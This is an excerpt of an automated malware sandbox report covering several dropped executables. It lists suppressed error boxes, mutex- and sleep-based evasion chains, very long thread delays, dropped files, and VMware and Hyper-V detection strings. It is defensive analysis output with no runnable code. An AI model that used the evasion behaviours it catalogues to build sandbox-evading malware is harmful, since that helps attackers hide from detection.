    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Contains functionality to detect sleep reduction / modifications
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040CE601_2_0040CE60
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040CE602_2_0040CE60
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040CE607_2_0040CE60
    Found evasive API chain (may stop execution after checking mutex)
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-4386
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4386
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_7-4386
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4386
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeMemory allocated: 8F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeMemory allocated: 1AFD0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeMemory allocated: 1360000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeMemory allocated: 1BA20000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeMemory allocated: 1300000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeMemory allocated: 1B980000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeMemory allocated: 36E0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeMemory allocated: 1BCD0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeMemory allocated: B20000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeMemory allocated: 1B130000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeMemory allocated: EE0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeMemory allocated: 1B560000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeMemory allocated: EA0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeMemory allocated: 1B580000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeMemory allocated: E50000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeMemory allocated: 1B7B0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeMemory allocated: 1A80000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeMemory allocated: 1B9C0000 memory reserve | memory write watch
    Source: C:\Windows\sysludpvs.exeThread delayed: delay time: 900000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\sysludpvs.exeWindow / User API: threadDelayed 1546Jump to behavior
    Source: C:\Windows\sysludpvs.exeWindow / User API: threadDelayed 3954Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\203235335.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2860723397.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvaded block: after key decisiongraph_1-4400
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvaded block: after key decisiongraph_1-4388
    Source: C:\Windows\sysludpvs.exeEvaded block: after key decisiongraph_7-4386
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_2-5789
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-5788
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_1-5319
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4407
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeAPI coverage: 3.9 %
    Source: C:\Windows\sysludpvs.exeAPI coverage: 1.0 %
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040CE607_2_0040CE60
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040CE601_2_0040CE60
    Source: C:\Windows\sysludpvs.exe TID: 8676Thread sleep time: -40000s >= -30000sJump to behavior
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep count: 198 > 30Jump to behavior
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep time: -396000s >= -30000sJump to behavior
    Source: C:\Windows\sysludpvs.exe TID: 8676Thread sleep count: 1546 > 30Jump to behavior
    Source: C:\Windows\sysludpvs.exe TID: 8800Thread sleep count: 138 > 30Jump to behavior
    Source: C:\Windows\sysludpvs.exe TID: 8708Thread sleep time: -900000s >= -30000sJump to behavior
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep count: 3954 > 30Jump to behavior
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep time: -7908000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe TID: 6888Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe TID: 6652Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exe TID: 8408Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\399630275.exe TID: 3976Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\393932919.exe TID: 5536Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe TID: 4944Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\38822795.exe TID: 9080Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe TID: 3488Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406690
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004067D0
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406690
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004067D0
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406690
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004067D0
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
    Source: C:\Windows\sysludpvs.exeThread delayed: delay time: 40000Jump to behavior
    Source: C:\Windows\sysludpvs.exeThread delayed: delay time: 900000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeThread delayed: delay time: 922337203685477
    Source: Amcache.hve.12.drBinary or memory string: VMware
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.LOG1.12.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
    Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.LOG1.12.drBinary or memory string: VMware Virtual RAMX
    Source: Amcache.hve.12.drBinary or memory string: vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
    Source: 2028814805.exe, 00000021.00000002.1820333386.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
    Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
